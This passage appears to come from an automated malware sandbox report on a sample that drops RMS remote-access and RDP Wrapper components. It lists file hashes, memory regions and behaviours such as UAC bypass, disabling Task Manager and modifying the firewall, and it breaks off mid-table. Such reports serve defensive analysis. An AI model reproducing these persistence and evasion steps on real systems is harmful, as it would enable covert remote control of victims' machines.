| SHA512 | e4fd5a0b08aa2321d06d578012ac1b0e7e53b06920ae75d6d8d5091fc10b3cdcd2c468eda3cfd0092107d0c9af042894f2f1b8e32255e6a11954a1e65e860f78 |
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp
| MD5 | 8708699d2c73bed30a0a08d80f96d6d7 |
| SHA1 | 684cb9d317146553e8c5269c8afb1539565f4f78 |
| SHA256 | a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f |
| SHA512 | 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264 |
\ProgramData\RDP\run.exe
| MD5 | c4f61801834172c1f1973e8791311340 |
| SHA1 | de48c219435feda6680c474b445c8f548441abc7 |
| SHA256 | c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d |
| SHA512 | 8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7 |
C:\ProgramData\RDP\run.exe
| MD5 | c4f61801834172c1f1973e8791311340 |
| SHA1 | de48c219435feda6680c474b445c8f548441abc7 |
| SHA256 | c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d |
| SHA512 | 8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7 |
C:\ProgramData\RDP\run.bat
| MD5 | 4e6a1033e3c2f39db397d392fe0d7c77 |
| SHA1 | 11526234cd216334902d51665529c2b9be7acc05 |
| SHA256 | 2eb8001ce06e7b2764fb7b4e637d53583e365640e72a3d53e1d3b4790ae306d4 |
| SHA512 | 395293d8ecd67f4c32702b11fdf0761f9e283346274ee1e4c4a3f47672fc683be4917fd87da2fde4e3d7e986e3884799329f9f28082e89f75aa17ca38c46dceb |
\ProgramData\RDP\run.exe
| MD5 | c4f61801834172c1f1973e8791311340 |
| SHA1 | de48c219435feda6680c474b445c8f548441abc7 |
| SHA256 | c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d |
| SHA512 | 8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7 |
C:\ProgramData\RDP\run.exe
| MD5 | c4f61801834172c1f1973e8791311340 |
| SHA1 | de48c219435feda6680c474b445c8f548441abc7 |
| SHA256 | c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d |
| SHA512 | 8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7 |
memory/548-75-0x0000000000340000-0x0000000000341000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RMS\regedit.reg
| MD5 | aae4fbd269f5d65a222f2db994b1c6e3 |
| SHA1 | cb4dafc589459b6eb1e69dd17e1718e8ac0b3f72 |
| SHA256 | e8ba276486dd6a256dbc0865c74521e8d3e26c735806c695c5c386f82663441c |
| SHA512 | e5660a4c8df0faf0db2dda9c09d18b606a97f4687ad9d4fe03fac39cf608adac21529fffa2f595a701ecde88d43d10390cdfbea2e9e6b9d7931e47f8254d0b71 |
\Users\Admin\AppData\Local\Temp\RMS\uac.exe
| MD5 | 84149257a74fae3b2922fb79e181fee2 |
| SHA1 | f0cbb804568971a8b990f01f8d07297c05fc44c0 |
| SHA256 | 4212603874d5211ba80331e24fd223a1788523d6a454b9aef3df8edc0a7d31bf |
| SHA512 | be90490ba50717b3b0a0f4bceee71c773add208b58d72d088cd6da59607fe7a8d4f3ccc676b14c3bd4aa8e056fa1cb9dff81f004a6789d9c2a1be6f6c655696c |
C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe
| MD5 | 84149257a74fae3b2922fb79e181fee2 |
| SHA1 | f0cbb804568971a8b990f01f8d07297c05fc44c0 |
| SHA256 | 4212603874d5211ba80331e24fd223a1788523d6a454b9aef3df8edc0a7d31bf |
| SHA512 | be90490ba50717b3b0a0f4bceee71c773add208b58d72d088cd6da59607fe7a8d4f3ccc676b14c3bd4aa8e056fa1cb9dff81f004a6789d9c2a1be6f6c655696c |
C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe
| MD5 | 84149257a74fae3b2922fb79e181fee2 |
| SHA1 | f0cbb804568971a8b990f01f8d07297c05fc44c0 |
| SHA256 | 4212603874d5211ba80331e24fd223a1788523d6a454b9aef3df8edc0a7d31bf |
| SHA512 | be90490ba50717b3b0a0f4bceee71c773add208b58d72d088cd6da59607fe7a8d4f3ccc676b14c3bd4aa8e056fa1cb9dff81f004a6789d9c2a1be6f6c655696c |
C:\Users\Admin\AppData\Local\Temp\9C6E.tmp\9C9E.bat
| MD5 | 41bd62ba30ba68ec4e214aafabf25804 |
| SHA1 | fd45aed5758f99872e130e60635f2acef76645e8 |
| SHA256 | e4a4aae0922f7dd92cf300fb6add8f3141101ac281d88de8514deb14af2c0af0 |
| SHA512 | 0b382d7ed4a40cfea9d5097c1ce41960323732c1892293f6c85263030493e0b01add165373ec8a83d11fd4562027552b69a4eea6d2f5791278d8f390ff37f63e |
\Users\Admin\AppData\Local\Temp\RMS\task.exe
| MD5 | b7d30e5c315855dde61bf985ef00ebe4 |
| SHA1 | 28c5edcd97e0e7338bc794174b3bfa3e4cbf5867 |
| SHA256 | f995083a06ac84ba368846278b44d5f91cde0b7f09f4adbabd91fcdffa395165 |
| SHA512 | 7519654a477a55ea282b5a0f384d9bbf6ea11c525260954c9fea6b188bf10c371a9266da3d95cb1d363921c6a207db4a45ba9242d7a1570b2cc3c3523fa1bc90 |
C:\Users\Admin\AppData\Local\Temp\RMS\task.exe
| MD5 | b7d30e5c315855dde61bf985ef00ebe4 |
| SHA1 | 28c5edcd97e0e7338bc794174b3bfa3e4cbf5867 |
| SHA256 | f995083a06ac84ba368846278b44d5f91cde0b7f09f4adbabd91fcdffa395165 |
| SHA512 | 7519654a477a55ea282b5a0f384d9bbf6ea11c525260954c9fea6b188bf10c371a9266da3d95cb1d363921c6a207db4a45ba9242d7a1570b2cc3c3523fa1bc90 |
C:\Users\Admin\AppData\Local\Temp\RMS\task.exe
| MD5 | b7d30e5c315855dde61bf985ef00ebe4 |
| SHA1 | 28c5edcd97e0e7338bc794174b3bfa3e4cbf5867 |
| SHA256 | f995083a06ac84ba368846278b44d5f91cde0b7f09f4adbabd91fcdffa395165 |
| SHA512 | 7519654a477a55ea282b5a0f384d9bbf6ea11c525260954c9fea6b188bf10c371a9266da3d95cb1d363921c6a207db4a45ba9242d7a1570b2cc3c3523fa1bc90 |
C:\Users\Admin\AppData\Local\Temp\A535.tmp\A536.bat
| MD5 | 973b0c9d6042bbdd0d78547bcc6bf036 |
| SHA1 | 2c352764d8410f19fc14f1a95db17e744ee55723 |
| SHA256 | 187bacda7879e31e4f29a027392a4e4fea81bfc2f86abd48c3079ff969c82797 |
| SHA512 | 8e5ee11a935e902b4d282a3057229535615571e2360e7e73b513fff7dfee34a9e30b1858b9e0d9790bf8e15f92607a46e9a81a1bba6122f4976aa0a77ec8b2b4 |
\Users\Admin\AppData\Local\Temp\RMS\defender.exe
| MD5 | b8a928d6df0741b9a2ee7b678a27f817 |
| SHA1 | c61fc60feb264be97628b4bad0633c31da987076 |
| SHA256 | 73e0dc6d8451996737727f9167a8e2a6924461c3d076d6f5506946393be9e3dc |
| SHA512 | afe353f3845675f31843e5e2ecf7d81586e52ea3b6d91107b4e2e703c34d8f28222fdb007f31893b3c833f532053ee30d50e8e10665734a5706029f7eba67c24 |
C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe
| MD5 | b8a928d6df0741b9a2ee7b678a27f817 |
| SHA1 | c61fc60feb264be97628b4bad0633c31da987076 |
| SHA256 | 73e0dc6d8451996737727f9167a8e2a6924461c3d076d6f5506946393be9e3dc |
| SHA512 | afe353f3845675f31843e5e2ecf7d81586e52ea3b6d91107b4e2e703c34d8f28222fdb007f31893b3c833f532053ee30d50e8e10665734a5706029f7eba67c24 |
C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe
| MD5 | b8a928d6df0741b9a2ee7b678a27f817 |
| SHA1 | c61fc60feb264be97628b4bad0633c31da987076 |
| SHA256 | 73e0dc6d8451996737727f9167a8e2a6924461c3d076d6f5506946393be9e3dc |
| SHA512 | afe353f3845675f31843e5e2ecf7d81586e52ea3b6d91107b4e2e703c34d8f28222fdb007f31893b3c833f532053ee30d50e8e10665734a5706029f7eba67c24 |
C:\Users\Admin\AppData\Local\Temp\A5E0.tmp\A5E1.bat
| MD5 | cc5b5df2834515d622d1c0a1bd4eadd2 |
| SHA1 | b1835556b419f667ac72c0de1383c470ad0469ea |
| SHA256 | 29dad257f98000f3603a882d1999e4934ec8e36907fd8222efff827be9d81fc8 |
| SHA512 | eb635c1f2f1d93215e64721da726da9034c580db74b0c0d2e085ef13e2e4562517a82087a6dcd6a06a5570bf3f19e5b0dc24ad1a32160fcb0e652f9a9ee6b121 |
\Users\Admin\AppData\Local\Temp\RMS\firewall.exe
| MD5 | 4954a72ec5e52b469bf63aa3dcff8b16 |
| SHA1 | 6cc0554e335d60b6953b75e814e161c63a409907 |
| SHA256 | b964f4411acc021b33d0c10cbb565ad1cdee329973a27636566c11f4a5adf31f |
| SHA512 | bde89d6063d73b3393753541c384d77316134b7a2718307c7d1b4221e1724d378aeedfb7c4141616b13934a35514aa7a92a11ccd93da2fc49f0db96f22d97b46 |
C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe
| MD5 | 4954a72ec5e52b469bf63aa3dcff8b16 |
| SHA1 | 6cc0554e335d60b6953b75e814e161c63a409907 |
| SHA256 | b964f4411acc021b33d0c10cbb565ad1cdee329973a27636566c11f4a5adf31f |
| SHA512 | bde89d6063d73b3393753541c384d77316134b7a2718307c7d1b4221e1724d378aeedfb7c4141616b13934a35514aa7a92a11ccd93da2fc49f0db96f22d97b46 |
C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe
| MD5 | 4954a72ec5e52b469bf63aa3dcff8b16 |
| SHA1 | 6cc0554e335d60b6953b75e814e161c63a409907 |
| SHA256 | b964f4411acc021b33d0c10cbb565ad1cdee329973a27636566c11f4a5adf31f |
| SHA512 | bde89d6063d73b3393753541c384d77316134b7a2718307c7d1b4221e1724d378aeedfb7c4141616b13934a35514aa7a92a11ccd93da2fc49f0db96f22d97b46 |
C:\Users\Admin\AppData\Local\Temp\AD9D.tmp\AD9E.bat
| MD5 | 902125bcd29f2c1e3ed47513b07d952a |
| SHA1 | d47f45491e758c68e602bf74f8b2c95e1f955800 |
| SHA256 | 176905e7abb1f5a0ff31aef142dcc5ec85905784a8b7c33f28cef970d3c673c3 |
| SHA512 | 7a1a77adfd457d07568e05af3b46d50bdc0dc79dc15533b702c8733930aff0e961acd2c2179c6742feab686515fa64dd915095e25564a47ea6ab6c47a813ff00 |
\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
memory/1324-103-0x00000000001C0000-0x00000000001C1000-memory.dmp
\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
memory/1312-107-0x00000000001C0000-0x00000000001C1000-memory.dmp
\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1160-115-0x00000000001C0000-0x00000000001C1000-memory.dmp
memory/484-116-0x00000000002F0000-0x00000000002F1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RMS\vp8decoder.dll
| MD5 | 0a98acb6e3389b806970d6b8afe849c3 |
| SHA1 | b9265779510c0f444ca58f6f6b3286d0f0439b77 |
| SHA256 | 733f5b78a50ffe54ab315efed57d3821be0b65e3f5db9c62607c904fb5efbf3f |
| SHA512 | 33b6d5b567536c32ad1553e664c357b301f89f2c60a3c0d37e7d73a295404706c80fce66d6d124a4b4293e13253267fcfeca482e387a5acb5ab04e57c5a54177 |
C:\Users\Admin\AppData\Local\Temp\RMS\vp8encoder.dll
| MD5 | 33425d50b3f3837bd129dbd22f60de00 |
| SHA1 | 81c8e05b1283d7e993aec25c7341e48678047249 |
| SHA256 | 521d85e9116c6a660a463340c1d5f91d1c50f7ef5f18081e58f6d57b33a56756 |
| SHA512 | 496cf0734dbbeacaa74b64fe5e8e1ed628bde736dba5ab91097bdc237ad95183cb3252503203f17810cd927cfa978d1794af7479163f794bb27f822aa3af4c58 |
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
| MD5 | ef6333a371161c3244425b5355cf4a85 |
| SHA1 | dd9b0c91c929b505dae93fe7e80bec5954591d73 |
| SHA256 | 04d5a7824dca49e7a1b170b3050b83a0eced83543bd860924de9faeb2c40a703 |
| SHA512 | a078f9a0d7979f793b4e0976fe369869e0e425ad139c86f3b9be2ae2386f7bc6f116c3ea8dc17ffbc0f003df0ef953535e638acf18e427f2797f46b1deae773c |
\ProgramData\RDP\RDPWInst.exe
| MD5 | 9c257b1d15817a818a675749f0429130 |
| SHA1 | 234d14da613c1420ea17de60ab8c3621d1599f6f |
| SHA256 | b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c |
| SHA512 | b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521 |
C:\ProgramData\RDP\RDPWInst.exe
| MD5 | 9c257b1d15817a818a675749f0429130 |
| SHA1 | 234d14da613c1420ea17de60ab8c3621d1599f6f |
| SHA256 | b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c |
| SHA512 | b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521 |
C:\ProgramData\RDP\RDPWInst.exe
| MD5 | 9c257b1d15817a818a675749f0429130 |
| SHA1 | 234d14da613c1420ea17de60ab8c3621d1599f6f |
| SHA256 | b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c |
| SHA512 | b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521 |
\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
| MD5 | ef6333a371161c3244425b5355cf4a85 |
| SHA1 | dd9b0c91c929b505dae93fe7e80bec5954591d73 |
| SHA256 | 04d5a7824dca49e7a1b170b3050b83a0eced83543bd860924de9faeb2c40a703 |
| SHA512 | a078f9a0d7979f793b4e0976fe369869e0e425ad139c86f3b9be2ae2386f7bc6f116c3ea8dc17ffbc0f003df0ef953535e638acf18e427f2797f46b1deae773c |
\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
| MD5 | ef6333a371161c3244425b5355cf4a85 |
| SHA1 | dd9b0c91c929b505dae93fe7e80bec5954591d73 |
| SHA256 | 04d5a7824dca49e7a1b170b3050b83a0eced83543bd860924de9faeb2c40a703 |
| SHA512 | a078f9a0d7979f793b4e0976fe369869e0e425ad139c86f3b9be2ae2386f7bc6f116c3ea8dc17ffbc0f003df0ef953535e638acf18e427f2797f46b1deae773c |
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
| MD5 | ef6333a371161c3244425b5355cf4a85 |
| SHA1 | dd9b0c91c929b505dae93fe7e80bec5954591d73 |
| SHA256 | 04d5a7824dca49e7a1b170b3050b83a0eced83543bd860924de9faeb2c40a703 |
| SHA512 | a078f9a0d7979f793b4e0976fe369869e0e425ad139c86f3b9be2ae2386f7bc6f116c3ea8dc17ffbc0f003df0ef953535e638acf18e427f2797f46b1deae773c |
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
| MD5 | ef6333a371161c3244425b5355cf4a85 |
| SHA1 | dd9b0c91c929b505dae93fe7e80bec5954591d73 |
| SHA256 | 04d5a7824dca49e7a1b170b3050b83a0eced83543bd860924de9faeb2c40a703 |
| SHA512 | a078f9a0d7979f793b4e0976fe369869e0e425ad139c86f3b9be2ae2386f7bc6f116c3ea8dc17ffbc0f003df0ef953535e638acf18e427f2797f46b1deae773c |
memory/1324-130-0x0000000000230000-0x0000000000231000-memory.dmp
memory/1620-131-0x00000000002B0000-0x00000000002B1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RMS\remsetup.bat
| MD5 | 085edd6244d42ba399475686e9b71ea7 |
| SHA1 | 77068b9f3bd7fad105ae1e4f57a5c463e194deb3 |
| SHA256 | f910663b3b2f6d48473d91c716b139583bf292a0dfe592b10b0dc9795e0f77f9 |
| SHA512 | 877313fb1c30e6a0a372d602c5fbd02ed9c86b658a46a282bb912d8d642aa1e3ce2d0febc6d2b119e7ff37f0b8ce0e97267315d9ccab7eba4f8a797e345d519c |
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
| MD5 | ef6333a371161c3244425b5355cf4a85 |
| SHA1 | dd9b0c91c929b505dae93fe7e80bec5954591d73 |
| SHA256 | 04d5a7824dca49e7a1b170b3050b83a0eced83543bd860924de9faeb2c40a703 |
| SHA512 | a078f9a0d7979f793b4e0976fe369869e0e425ad139c86f3b9be2ae2386f7bc6f116c3ea8dc17ffbc0f003df0ef953535e638acf18e427f2797f46b1deae773c |
\Program Files\RDP Wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
memory/1052-136-0x000007FEFB9C1000-0x000007FEFB9C3000-memory.dmp
\ProgramData\RDP\RDPWInst.exe
| MD5 | 9c257b1d15817a818a675749f0429130 |
| SHA1 | 234d14da613c1420ea17de60ab8c3621d1599f6f |
| SHA256 | b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c |
| SHA512 | b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521 |
C:\ProgramData\RDP\RDPWInst.exe
| MD5 | 9c257b1d15817a818a675749f0429130 |
| SHA1 | 234d14da613c1420ea17de60ab8c3621d1599f6f |
| SHA256 | b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c |
| SHA512 | b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521 |
C:\Program Files\RDP Wrapper\rdpwrap.ini
| MD5 | dddd741ab677bdac8dcd4fa0dda05da2 |
| SHA1 | 69d328c70046029a1866fd440c3e4a63563200f9 |
| SHA256 | 7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668 |
| SHA512 | 6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
| MD5 | c39f7e337bab5d1e58ebd11e334426d2 |
| SHA1 | bc73b69a2b06d36df926867cb5cf9b637d1871f8 |
| SHA256 | a7113e0c60b28c7512a714f957ba5cb0da83eef4ab785b9a223b86e0247475d6 |
| SHA512 | d585b3edb423bde4d75d0d5009538b1394e0133601fd0ca8341fe67e75eb5794c38c5ea8d02eb98f64ff670744effe1b86ece6a2840abb6f33c917071657d0c1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
| MD5 | 85e3b436490181218c6c9334d9f61b8a |
| SHA1 | 3235a094465d3fa510a400606fd591630e7e77fc |
| SHA256 | 3f4190f5bbf8aab8e7b547994a67321be50e128f6b14bebd462222c2beb57b40 |
| SHA512 | ece664a457f7310dcf9d8cb9a3f5bd613765d7938b06c2d81ab2db8bf0b3904cd76ad426a589fa80d742cd84ce17efe0a9f331dc7b70054335b7607c4c016896 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | aca4d188af2251a00bb1631560a590d9 |
| SHA1 | 81eaac184c87160750b6ffaf0d79a8a628ca9c3f |
| SHA256 | 8f03e6ef99cbba313e8153367c209777932593c373bff86cb280025173865fce |
| SHA512 | fbb1dace446f14d47aa2f4d167e5aa5fb6d8eaeec24515d88c0b89ab72cedf14507e2699fe0c79a4190c6b2c9f1ab3f564c8780709525e9d60885d261da43e1f |
Analysis: behavioral2
Detonation Overview
Submitted
2022-02-08 16:54
Reported
2022-02-08 18:41
Platform
win10v2004-en-20220113
Max time kernel
174s
Max time network
204s
Command Line
Signatures
RMS
UAC bypass
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\task.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Modifies Windows Firewall
Sets DLL path for service in the registry
Sets file to hidden
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RMS\task.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\ProgramData\RDP\run.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
